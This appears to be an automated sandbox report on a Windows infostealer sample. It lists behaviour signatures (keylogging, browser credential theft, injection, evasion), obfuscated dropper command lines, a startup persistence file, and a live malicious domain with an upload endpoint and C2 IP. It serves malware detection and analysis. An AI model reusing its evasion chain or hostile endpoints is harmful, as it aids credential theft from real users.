Play interactive tour

Edit tour

Analysis Report WDnE51mua6.exe

Overview

General Information

Sample Name:	WDnE51mua6.exe
Analysis ID:	383838
MD5:	7e7012645cc3d6d3572bb01891fbcec1
SHA1:	712fe21354098f3764f6e9cbe7b57dc67a65c478
SHA256:	df116f3585f1fe4b00c351a2941f6b85565e1fcc6da5569c6f7c80ddd1b4e2a8
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Submitted sample is a known malware sample

Contains functionality to register a low level keyboard hook

Creates processes via WMI

Drops PE files with a suspicious file extension

Injects a PE file into a foreign processes

Machine Learning detection for sample

Obfuscated command line found

Tries to harvest and steal browser information (history, passwords, etc)

Uses nslookup.exe to query domains

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes to foreign memory regions

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

WDnE51mua6.exe (PID: 3000 cmdline: 'C:\Users\user\Desktop\WDnE51mua6.exe' MD5: 7E7012645CC3D6D3572BB01891FBCEC1)

svchost.exe (PID: 5744 cmdline: 'C:\Windows\System32\svchost.exe' MD5: FA6C268A5B5BDA067A901764D203D433)

cmd.exe (PID: 3908 cmdline: 'C:\Windows\System32\cmd.exe' /c CmD < Poi.vsd MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5720 cmdline: CmD MD5: F3BDBE3BB6F734E357235F4D5898582D)

findstr.exe (PID: 4808 cmdline: findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd MD5: 8B534A7FC0630DE41BB1F98C882C19EC)

Gia.exe.com (PID: 2904 cmdline: Gia.exe.com D MD5: 78BA0653A340BAC5FF152B21A83626CC)

Gia.exe.com (PID: 5596 cmdline: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com D MD5: 78BA0653A340BAC5FF152B21A83626CC)

nslookup.exe (PID: 6348 cmdline: C:\Windows\SysWOW64\nslookup.exe MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

PING.EXE (PID: 5044 cmdline: ping 127.0.0.1 -n 30 MD5: 70C24A306F768936563ABDADB9CA9108)

wscript.exe (PID: 5868 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\zPgFqFUsML\wAYZqHgYEOdcYU.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

juROhmfLml.exe.com (PID: 6204 cmdline: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com C:\Users\user\AppData\Roaming\zPgFqFUsML\I MD5: 78BA0653A340BAC5FF152B21A83626CC)

nslookup.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\nslookup.exe MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

cmd.exe (PID: 5192 cmdline: cmd.exe /C ver > 'C:\Users\user\AppData\Local\Temp\chrCF8.tmp' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6308 cmdline: cmd.exe /C wmic process get Name > 'C:\Users\user\AppData\Local\Temp\chr1073.tmp' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 580 cmdline: wmic process get Name MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)

cmd.exe (PID: 3624 cmdline: cmd /c makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

makecab.exe (PID: 5036 cmdline: makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp' MD5: D0D74264402D9F402615F22258330EC8)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Drops script at startup location

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com, ProcessId: 5596, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juROhmfLml.url

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd491	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49r	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/upload/upload.php	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/kh=	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/8	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/hi0	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/upload/upload.phpmit	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/upload/upload.phpp/hi0	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/#hu	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/5hc	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/ography	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49lcanoconiosispZ	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/sFt	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/Dg	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/Vg	Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/oi9	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for submitted file

Show sources

Source: WDnE51mua6.exe	Virustotal: Detection: 41%			Perma Link
Source: WDnE51mua6.exe	ReversingLabs: Detection: 64%

Machine Learning detection for sample

Show sources

Source: WDnE51mua6.exe

Joe Sandbox ML: detected

Source: WDnE51mua6.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 8.208.95.18:443 -> 192.168.2.6:49730 version: TLS 1.2

Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_00409931 ??2@YAPAXI@Z,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_00404402 FindFirstFileW,FindClose,SetLastError,CompareFileTime,
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_00403327 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,
Source: C:\Users\user\Desktop\WDnE51mua6.exe	Code function: 0_2_00403442 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Code function: 6_2_0091E334 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0028E334 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0029A32C FindFirstFileW,Sleep,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002965AE FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0025C6C2 FindFirstFileExW,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00297205 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_002972A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0028D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_0028DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00299E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Code function: 12_2_00299F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,

Networking:

Uses nslookup.exe to query domains

Show sources

Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Process created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Process created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com	Process created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	Process created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe

Uses ping.exe to check the status of other devices and networks

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30

Source: Joe Sandbox View	IP Address: 8.208.95.18 8.208.95.18
Source: Joe Sandbox View	IP Address: 8.208.95.18 8.208.95.18

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com

Code function: 12_2_0029D672 InternetReadFile,SetEvent,GetLastError,SetEvent,

Source: unknown

DNS traffic detected: queries for: zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyR

Source: nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: nslookup.exe, 00000010.00000003.514415275.0000000003B97000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root
Source: nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: nslookup.exe, 00000010.00000003.514235035.0000000003B7E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DST#
Source: nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0-
Source: nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Gia.exe.com, 00000006.00000000.354716969.0000000000985000.00000002.00020000.sdmp, Gia.exe.com, 00000007.00000002.502867230.0000000000985000.00000002.00020000.sdmp, juROhmfLml.exe.com, 0000000C.00000002.529162484.00000000002F5000.00000002.00020000.sdmp, Gia.exe.com.5.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp, nslookup.exe, 00000010.00000003.584413680.0000000003BE2000.00000004.00000001.sdmp	String found in binary or memory: https://banusdoret.top/
Source: nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp	String found in binary or memory: https://banusdoret.top/#hu
Source: nslookup.exe, 00000010.00000002.591863693.0000000003B64000.00000004.00000020.sdmp	String found in binary or memory: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49
Source: nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmp	String found in binary or memory: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd491
Source: nslookup.exe, 00000010.00000002.591717257.0000000003B30000.00000004.00000020.sdmp	String found in binary or memory: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49lcanoconiosispZ
Source: nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmp	String found in binary or memory: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49r
Source: nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp	String found in binary or memory: https://banusdoret.top/5hc
Source: nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmp	String found in binary or memory: https://banusdoret.top/8
Source: nslookup.exe, 00000010.00000003.584413680.0000000003BE2000.00000004.00000001.sdmp	String found in binary or memory: https://banusdoret.top/Dg
Source: nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp	String found in binary or memory: https://banusdoret.top/Vg
Source: nslookup.exe, 00000010.00000003.536247326.0000000003BE2000.00000004.00000001.sdmp	String found in binary or memory: https://banusdoret.top/hi0
Source: nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp	String found in binary or memory: https://banusdoret.top/kh=
Source: nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmp	String found in binary or memory: https://banusdoret.top/ography
Source: nslookup.exe, 00000010.00000003.544012619.0000000003BE2000.00000004.00000001.sdmp	String found in binary or memory: https://banusdoret.top/oi9
Source: nslookup.exe, 00000010.00000002.591863693.0000000003B64000.00000004.00000020.sdmp	String found in binary or memory: https://banusdoret.top/sFt
Source: nslookup.exe, 00000010.00000002.591747509.0000000003B37000.00000004.00000020.sdmp	String found in binary or memory: https://banusdoret.top/upload/upload.php
Source: nslookup.exe, 00000010.00000003.532175709.0000000003BE2000.00000004.00000001.sdmp	String found in binary or memory: https://banusdoret.top/upload/upload.phpmit
Source: nslookup.exe, 00000010.00000003.532175709.0000000003BE2000.00000004.00000001.sdmp	String found in binary or memory: https://banusdoret.top/upload/upload.phpp/hi0
Source: nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp	String found in binary or memory: https://banusdoret.topctionSettings
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Gia.exe.com.5.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
